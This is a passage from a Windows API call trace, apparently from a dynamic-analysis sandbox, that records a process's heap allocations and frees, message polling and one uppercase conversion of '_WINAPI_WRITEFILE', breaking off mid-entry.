[0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.055] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.056] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0172.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.059] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.059] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0172.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0172.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0172.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0172.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0172.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.064] HeapFree (in: 